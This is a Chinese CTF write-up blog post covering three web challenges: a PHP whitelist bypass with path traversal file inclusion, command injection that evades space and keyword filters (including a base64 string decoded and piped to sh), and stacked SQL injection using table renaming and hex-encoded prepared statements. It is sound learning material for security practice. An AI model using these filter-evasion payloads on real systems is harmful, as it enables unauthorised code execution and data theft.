文章目录
[HCTF 2018]WarmUp
keywords:php,代码审计
打开只有一张图
代码检查
- 检查代码,发现注释,有个source.php文件,访问它
得到如下代码
需要代码审计,粗略看了下,从CheckFile等几个字眼知道,大概是要检查是否有文件、或者是否包含关键字。按照提示,先访问hint.php.。
得到这个页面,提示flag在ffffllllaaaagggg,搞清楚这个ffffllllaaaagggg是变量还是什么文件
代码分析
类emmm分析
part 1:
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
-
传参source.php(如上面代码)和hint.php
需要include ffffllllaaaagggg。 -
若_page的值在数组$whitelist中,则返回true。
-
mb_substr(string $str , int $start , int $length)----
按照位置截断字符串。 -
mb_strpos(haystack, needle)----
查找字符串needle在另一个字符串haystack中首次出现的位置,返回位置(int) -
整体逻辑:将page字符串第一个问号?以前的字符串截下来,保存在$_page中,若_page值为source.php、hint.php则返回true
part 2:
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
_page变量作出如下变化:一次url解码,一次问号截断
注意:url传入服务器会自动进行一次urldecode。?的url编码为%3F,双重url编码为%253F
让函数checkFile返回true
以下三种构造方式均可让emmm::checkFile($_REQUEST[‘file’])返回true:
(1)满足直接传递参数if语句:file=source.php
(2)满足问号截断if语句:file=source.php?xxxxxxxxx
(3)满足url编码后问号截断的if语句:file=source.php%253Fxxxxxxx
.
注:source.php可换成hint.php。
构造payload
?file=source.php?/../../../../ffffllllaaaagggg
?file=source.php%253F/../../../../ffffllllaaaagggg
原理:
(1)要满足emmm::checkFile($_REQUEST[‘file’])返回true
(2)要include找到文件ffffllllaaaagggg
(3)目录穿越次数暂时不知道?—
疑惑解释
疑惑:source.php?/ 不是文件目录为何能找到ffffllllaaaagggg?
解释:include会将source.php?/看做是一个目录,即使它不存在,只要通过几个 …/ 返回上级目录即可。比如 file=source.php?/aaa/bbb/ccc/../../../../../../../ffffllllaaaagggg 依然可行
正文代码
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
满足3个条件,文件被包含:
1.存在文件
2.为字符串
3.emmm::checkFile($_REQUEST[‘file’])返回true
[GXYCTF2019]Ping Ping Ping
keywords: RCE
cnm
过滤了空格
思路:
用两次url编码尝试
...|cat%2520flag
过滤了字符串flag
思路:
- 编码绕过关键词
- 变量拼接绕过关键字
(后来试了下,两次url编码不太方便后续命令,还是用用$IFS$数字比较好)
尝试base64编码
cat$IFS$9flag.php
Y2F0JElGUyQ5ZmxhZy5waHA=
payload:
?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh
发现flag在代码里面
第二种方法:变量拼接
构造payload:
?ip=1;a=fl;b=ag;cat$IFS$9$a$b.php //fxck ur flag
?ip=1;b=ag;cat$IFS$9fl$b.php //成功
[强网杯 2019]随便注
- 随便注入, 爆字段数量
1' order by 1;
1' order by 2;
1' order by 3;
2. 爆库
过滤了select
使用堆叠注入
1' ; show database();
有回显
- 爆表
- 爆字段
1' ; show columns from words;
没找到什么flag,看看另一个表(没看到东西)
表名为数字时,要用反引号包起来查询
抄大佬作业:
由show的作用可知,words表内就两个字段,一个叫id,一个叫data
并且可以得知,该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。因此我们对表进行改名:
用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。
1' ;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);
这里补充一下alter的用法:
//alter可以修改已知表的列
alter table "table_name" add "column_name" type;//添加一个列
alter table "table_name" drop "column_name" type;//删除一个列
alter table "table_name" alter column "column_name" type;//改变列的数据类型
alter table "table_name" change "column1" "column2" type;//改列名
alter table "table_name" rename "column1" to "column2";//改列名
解法2:
由于select被过滤了,因此将select * from ` 1919810931114514``进行十六进制编码,再构造payload。
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
知识点:
- prepare…from…是预处理语句,会进行编码转换
- execute用来执行由SQLPrepare创建的SQL语句。
- SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
762
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
